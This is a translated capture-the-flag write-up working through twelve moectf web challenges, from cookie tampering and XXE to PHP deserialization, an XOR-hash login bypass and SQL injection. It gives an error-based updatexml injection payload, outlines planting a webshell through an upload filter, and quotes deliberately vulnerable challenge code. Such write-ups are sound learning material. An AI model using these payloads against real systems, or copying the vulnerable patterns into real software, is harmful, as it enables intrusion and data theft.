01 http
Open the challenge environment; it asks you to complete all the tasks. Capture a request with Burp, modify it as the tasks require, and you get the flag: moectf{basic_http_knowledge_HJbg427uFuznTqiJdtS1xhZNwpdsOnKU}
02 Web入门指北 (Web beginner's guide)
Jump straight to the end of the page and you find garbled text; decode it. For the encoding, try URL encoding and base64 through to hex.
You don't actually need base64 decoding here, but let me share a really handy site:
Base64 encoding converter / Base64 encrypt and decrypt (qqxiuzi.cn)
flag: bW9lY3Rme3czbENvbWVfVG9fbW9lQ1RGX1cyYl9jaGFsbGVuZ0UhIX0
Decoding that gives the flag.
03 彼岸的flag (The flag on the far shore)
The page looks like this: type something and click send, and the page reacts. Capturing with Burp and clicking send intercepts nothing, so there is probably no upload involved. Look at the page source instead: a very simple code audit gives the flag: moectf{find_comments__HwdtkZ2yRpjPQlJBG0onhIg0X2lWmoy}
04 cookies
Opening the attachment, it is a description of some APIs.
The page looks like the screenshot. Capture a request first and try the operations the attachment describes: it says the user already exists.
Change the name and registration works.
Keep following the attachment: login works too. Trying to fetch the flag repeatedly says you need to be logged in, and at this point the token that kept showing up caught my attention. My laptop ran out of battery here; afterwards I restarted the environment and continued, and found the token was always the same.
Decode the token. Sending the token with Burp shows that admin is required, so go back to the decoder site, change the data, and send it in. That gives the flag: moectf{cooKi3_is_d3licious_MA9iVff90SSJ!!M6Mrfu9ifxi9i!JGofMJ36D9cPMxro}
05 gas!gas!gas!
Opening the challenge, condition 3 requires reacting within 0.5 s, so my first judgement was that this needs a script:

```python
import requests
import re

url = "http://localhost:12028/"

control = 0
throttle = 2

data1 = {"driver": "august", "steering_control": control, "throttle": throttle}
# The separator between the two groups was lost in extraction; a Chinese comma is assumed here.
pattern = r"弯道(.*?)，(.*?)</font>"

with requests.Session() as session:
    for i in range(7):
        response = session.post(url, data=data1)
        print(response.text)
        match = re.search(pattern, response.text)
        if match:
            # steering: 向左 (left) -> 1, 向右 (right) -> -1, otherwise straight
            if match.group(1) == "向左":
                control = 1
            elif match.group(1) == "向右":
                control = -1
            else:
                control = 0
            # throttle: 抓地力太小了 (too little grip) -> 0, 抓地力太大了 (too much grip) -> 2, otherwise 1
            if match.group(2) == "抓地力太小了":
                throttle = 0
            elif match.group(2) == "抓地力太大了":
                throttle = 2
            else:
                throttle = 1
            data1 = {"driver": "august", "steering_control": control, "throttle": throttle}
        else:
            print("error")
            break
```

Running it gives the flag: moectf{Beautiful_Drifting!!_vsDP9tPr3e0lSCkIMVELPYYwJBEJDN-r}
06 moe图床 (moe image host)
I assumed this is a file-upload vulnerability.
Looking at the source, only files ending in .png may be uploaded.
Change the extension with Burp.
Then try it with AntSword (蚁剑). If that fails at first, don't lose heart: try changing the address.
Success; the flag is found: moectf{hmmm_improper_filter_883hLAj2HD_aK29E7lS-YAFjAK2jhdZc}
07 了解你的座驾 (Know your ride)
I fiddled with it for a long while without a clue, then captured a request with Burp: it is XML, which looks like an XXE challenge.
Trying it gives the flag: moectf{Which_one_Youve_Chosen?VZzyn4IjX5cVL3mZng7FE2nfJ9d_duxM}
My payload here is a bit sloppy; it worked on the first try and I couldn't be bothered to clean it up.
08 大海捞针 (Needle in a haystack)
The challenge looks like this; the description is very explicit.
Brute-force it with Burp to get the flag: moectf{script_helps_ULOZw7NrjEIKRZ4V}
09 meo图床 (meo image host)
It opens like this. I tried Burp and AntSword with no result, so I started reading the challenge carefully.
The name parameter used here gave me an idea, so I tried it.
It didn't hand over the flag directly, but it gave a clue; follow the clue.
One look and it is an md5 bypass. Flag: moectf{oops_file_get_contents_controllable_m6Fkl9EmwKrHTPmwEw7ku8euCQ3tToyH}
10 夺命十三枪 (Thirteen Deadly Spears)
A quick code audit finds unserialize: a PHP deserialization challenge.
Open the file provided and look at it. The script passes the given parameter to the classes and methods in Hanxin.exe.php for processing.
The execution flow is as follows:
1. highlight_file prints the current file's source, i.e. it shows the code to the user.
2. Hanxin.exe.php is included.
3. If the request has a chant parameter, its value is assigned to $Chant; otherwise it defaults to '夺命十三枪'.
4. An Omg_It_Is_So_Cool_Bring_Me_My_Flag object $newvisitor is created, with $Chant passed as the constructor argument.
5. serialize() turns $newvisitor into a string, which is assigned to $before.
6. $before is passed to Deadly_Thirteen_Spears::Make_a_Move for processing, and the result is assigned to $after.
7. The processed string $after is printed as the user's action feedback.
8. unserialize() is used to turn $after back into an object, and the result is printed. If an Exception is thrown, something went wrong during execution and the error message is printed.
The other file is a PHP program that implements the two classes Deadly_Thirteen_Spears and Omg_It_Is_So_Cool_Bring_Me_My_Flag.
Deadly_Thirteen_Spears defines a private static member Top_Secret_Long_Spear_Techniques_Manual, an associative array of thirteen "spears" and their corresponding "movements". Make_a_Move replaces every part of its argument that matches a key of Top_Secret_Long_Spear_Techniques_Manual with the corresponding value and returns the result.
Omg_It_Is_So_Cool_Bring_Me_My_Flag defines two members, Chant and Spear_Owner, with a constructor that initialises them. Its __toString method returns different strings depending on Spear_Owner: if Spear_Owner is not MaoLei it returns "Far away from COOL…", otherwise it returns "Omg You're So COOOOOL!!!" together with the FLAG value read from the environment.
So overall the code replaces specific keywords in the passed-in parameter and then returns a string that depends on $Spear_Owner.
The goal is for what follows the chant to become `";s:11:"Spear_Owner";s:6:"MaoLei";}`; that string is 35 characters long.
Each replacement di_shi_san_qiang -> Unrepentant_Lethality escapes 5 characters (16 -> 21), so repeating it 7 times (7 × 5 = 35) is enough. Flag: moectf{C00L_b0Y!_56MXZcV8BDqE8Zxn0LkEMGEIHs1HXz7m}
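To see why the 7 × 5 = 35 arithmetic works, here is an added example (not the challenge's code) that mimics the serialize, Make_a_Move, unserialize sequence in Python with a parser that, like PHP, trusts the declared string length. The class layout, the "Nobody" default owner and the single manual entry are assumptions; the lesson for a defender is that keyword substitution must never run on already serialized data.

```python
# Added example (not the challenge's code). Assumed: class layout, a "Nobody" default
# owner, and only the one manual entry the writeup names; ASCII input (PHP counts bytes).
MANUAL = {"di_shi_san_qiang": "Unrepentant_Lethality"}  # 16 -> 21 chars: +5 per hit
TAIL = '";s:11:"Spear_Owner";s:6:"MaoLei";}'             # the 35-char tail from the writeup
CLS = "Omg_It_Is_So_Cool_Bring_Me_My_Flag"

def php_serialize_visitor(chant, owner="Nobody"):
    """Mimic PHP serialize() for an object with two public string properties."""
    return (f'O:{len(CLS)}:"{CLS}":2:{{s:5:"Chant";s:{len(chant)}:"{chant}";'
            f's:11:"Spear_Owner";s:{len(owner)}:"{owner}";}}')

def make_a_move(serialized):
    """The bug: str_replace-style keyword substitution applied to serialized data."""
    for key, value in MANUAL.items():
        serialized = serialized.replace(key, value)
    return serialized

def php_unserialize(data):
    """Length-honouring parser for O:..{s:..;}; trailing bytes are ignored, as in PHP."""
    def take(pos, tok):  # require literal token at pos, return the position after it
        if not data.startswith(tok, pos):
            raise ValueError(f"expected {tok!r} at offset {pos}")
        return pos + len(tok)
    def num(pos):  # decimal up to ':' -> (value, position after ':')
        end = data.index(":", pos)
        return int(data[pos:end]), end + 1
    def string(pos):  # s:N:"...";  the declared N wins, whatever the content says
        n, pos = num(take(pos, "s:"))
        pos = take(pos, '"')
        return data[pos:pos + n], take(pos + n, '";')
    n, pos = num(take(0, "O:"))
    pos = take(pos, '"')
    cls, pos = data[pos:pos + n], take(pos + n, '":')
    count, pos = num(pos)
    pos, props = take(pos, "{"), {}
    for _ in range(count):
        key, pos = string(pos)
        props[key], pos = string(pos)
    take(pos, "}")
    return cls, props

def owner_after_move(chant):
    """serialize -> Make_a_Move -> unserialize, as the challenge does; None on parse error."""
    try:
        return php_unserialize(make_a_move(php_serialize_visitor(chant)))[1]["Spear_Owner"]
    except ValueError:
        return None

def escape_payload(copies=7):
    """copies x 5 extra chars; with 7 that is 35 = len(TAIL), so TAIL parses as real fields."""
    return "di_shi_san_qiang" * copies + TAIL
```

With 6 copies the declared length lands in the middle of the tail and parsing fails, which is the same Exception branch the challenge script prints.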
11 signin
Clicking does nothing, so capture the request and have a look. It looks like base64.
After decoding 5 times, my guess is that admin has to be changed.
There is an attachment; open it:
```python
from secrets import users, salt  # the challenge's own secrets.py (users dict and salt), not the stdlib module
import hashlib
import base64
import json
import http.server

with open("flag.txt", "r") as f:
    FLAG = f.read().strip()


def gethash(*items):
    c = 0
    for item in items:
        if item is None:
            continue
        c ^= int.from_bytes(hashlib.md5(f"{salt}[{item}]{salt}".encode()).digest(), "big")  # it looks so complex! but is it safe enough?
    return hex(c)[2:]


# comparison operators were lost in extraction; "==" is reconstructed throughout
assert "admin" in users
assert users["admin"] == "admin"

hashed_users = dict((k, gethash(k, v)) for k, v in users.items())

eval(int.to_bytes(0x636d616f686e69656e61697563206e6965756e63696165756e6320696175636e206975616e6363616361766573206164 ^ 8651845801355794822748761274382990563137388564728777614331389574821794036657729487047095090696384065814967726980153, 160, "big", signed=True).decode().translate({ord(c): None for c in "\x00"}))  # what is it?


def decrypt(data: str):
    for x in range(5):
        # as printed on the page (on a str this would raise TypeError); the writeup treats this as five rounds of base64 decoding
        data = base64.b64encode(data).decode()  # ummm...? It looks like its just base64 encoding it 5 times? truely?
    return data


# the page body was elided in the original source; a labelled placeholder stands in for it
__page__ = base64.b64encode(b"<page HTML elided in the original>")


class MyHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        try:
            if self.path == "/":
                self.send_response(200)
                self.end_headers()
                self.wfile.write(__page__)
            else:
                self.send_response(404)
                self.end_headers()
                self.wfile.write(b"404 Not Found")
        except Exception as e:
            print(e)
            self.send_response(500)
            self.end_headers()
            self.wfile.write(b"500 Internal Server Error")

    def do_POST(self):
        try:
            if self.path == "/login":
                body = self.rfile.read(int(self.headers.get("Content-Length")))
                payload = json.loads(body)
                params = json.loads(decrypt(payload["params"]))
                print(params)
                if params.get("username") == "admin":
                    self.send_response(403)
                    self.end_headers()
                    self.wfile.write(b"YOU CANNOT LOGIN AS ADMIN!")
                    print("admin")
                    return
                if params.get("username") == params.get("password"):
                    self.send_response(403)
                    self.end_headers()
                    self.wfile.write(b"YOU CANNOT LOGIN WITH SAME USERNAME AND PASSWORD!")
                    print("same")
                    return
                hashed = gethash(params.get("username"), params.get("password"))
                for k, v in hashed_users.items():
                    if hashed == v:
                        data = {
                            "user": k,
                            "hash": hashed,
                            "flag": FLAG if k == "admin" else "flag{YOU_HAVE_TO_LOGIN_IN_AS_ADMIN_TO_GET_THE_FLAG}",
                        }
                        self.send_response(200)
                        self.end_headers()
                        self.wfile.write(json.dumps(data).encode())
                        print("success")
                        return
                self.send_response(403)
                self.end_headers()
                self.wfile.write(b"Invalid username or password")
            else:
                self.send_response(404)
                self.end_headers()
                self.wfile.write(b"404 Not Found")
        except Exception as e:
            print(e)
            self.send_response(500)
            self.end_headers()
            self.wfile.write(b"500 Internal Server Error")


if __name__ == "__main__":
    server = http.server.HTTPServer(("", 9999), MyHandler)
    server.serve_forever()
```
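The weak spot in the server above is gethash: it XORs one MD5 per item, so any two items that render to the same string cancel to 0 (which is exactly admin's stored hash, since users["admin"] is "admin"), and swapping username and password never changes the result; the handler's equality check on the raw JSON values does not close that, because values such as the integer 1 and the string "1" are unequal to Python yet identical once formatted. This added example (not the challenge's code; the salt is a constructed stand-in) reproduces the scheme, mirrors the handler's checks, and shows a hash over the length-prefixed tuple that removes the cancellation.

```python
# Added example, not the challenge's code. SALT is constructed; the real one lives in the
# challenge's secrets module and plays no part in the collision shown here.
import hashlib

SALT = "constructed-salt"

def gethash(*items):
    """The challenge's scheme: XOR of one MD5 per item (None items are skipped)."""
    c = 0
    for item in items:
        if item is None:
            continue
        c ^= int.from_bytes(hashlib.md5(f"{SALT}[{item}]{SALT}".encode()).digest(), "big")
    return hex(c)[2:]

def fixed_hash(*items):
    """Hash the whole tuple as one message with length-prefixed fields, so field
    order and boundaries matter and no two fields can cancel each other out."""
    h = hashlib.sha256(SALT.encode())
    for item in items:
        field = b"" if item is None else str(item).encode()
        h.update(len(field).to_bytes(4, "big") + field)
    return h.hexdigest()

def login_verdict(username, password, hasher=gethash):
    """Mirror the handler's checks and report which branch a request takes."""
    if username == "admin":
        return "blocked: admin"
    if username == password:          # raw JSON values: 1 and "1" pass this check
        return "blocked: same"
    # admin's stored entry is hasher("admin", "admin"), since users["admin"] == "admin"
    if hasher(username, password) == hasher("admin", "admin"):
        return "logged in as admin"
    return "rejected"
```

The first two checks are a denylist bolted onto a broken hash; fixed_hash makes the denylist unnecessary because distinct tuples no longer collide by construction.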
When I did it at the time, seeing {username:admin,password:admin} I figured admin definitely had to be changed.
So I tried, and it worked.
Here I first changed both admin values to 1, then
changed it to {username:1,password:2}. After a few tries I found that changing it to {username:1,password:1} gives the flag: moectf{C0nGUrAti0ns!_y0U_hAve_sUCCessFUlly_siGnin!_iYlJf!M3rux9G9Vf!Jox}
12 出去旅游的心海 (Kokomi on holiday)
I fell asleep and the competition had ended by the time I woke up, so the environment was gone; I'll describe it roughly and fill in the details once I can reproduce it.
SQL injection. First, F12 gets you a .php file; open it and you can see the code.
The code below was found online:
```php
<?php
/*
Plugin Name: Visitor auto recorder
Description: Automatically record visitors identification, still in development, do not use in industry environment!
Author: KoKoMi
Still in development! :)
*/

// No peeking at this code, I'm still debugging it
highlight_file(__FILE__);

// Load the database config; a hard-coded absolute path for now
require_once("/var/www/html/wordpress/" . "wp-config.php");

$db_user = DB_USER;         // database user
$db_password = DB_PASSWORD; // database password
$db_name = DB_NAME;         // database name
$db_host = DB_HOST;         // database host

// I remember WordPress provides global $wpdb for database access; I'll look into it after the trip
// This is temporary code
$ip = $_POST["ip"];
$user_agent = $_POST["user_agent"];
$time = stripslashes($_POST["time"]);  // removes backslash escaping, so quotes in time reach the query intact

$mysqli = new mysqli($db_host, $db_user, $db_password, $db_name);

// Check whether the connection succeeded
if ($mysqli->connect_errno) {
    echo "数据库连接失败: " . $mysqli->connect_error;
    exit();
}

// The POST values are interpolated straight into the statement: this is the injection point
// (the quoting was lost in extraction and is reconstructed here)
$query = "INSERT INTO visitor_records (ip, user_agent, time) VALUES ('$ip', '$user_agent', '$time')";

// Run the insert
$result = mysqli_query($mysqli, $query);

// Check whether the insert succeeded
if ($result) {
    echo "数据插入成功";
} else {
    echo "数据插入失败: " . mysqli_error($mysqli);  // the MySQL error text is returned to the client
}

// Close the database connection
mysqli_close($mysqli);
```

This looks like an error-based injection; try updatexml (sqlmap would also work, but my sqlmap had some issues).
After enumerating the database name, table names and so on:
1 and updatexml(1,substring(concat(0x7e,(select group_concat(content,0x7e,id) from secret_of_kokomi)),30,40),1)
The payload is roughly like this, and it gives the flag.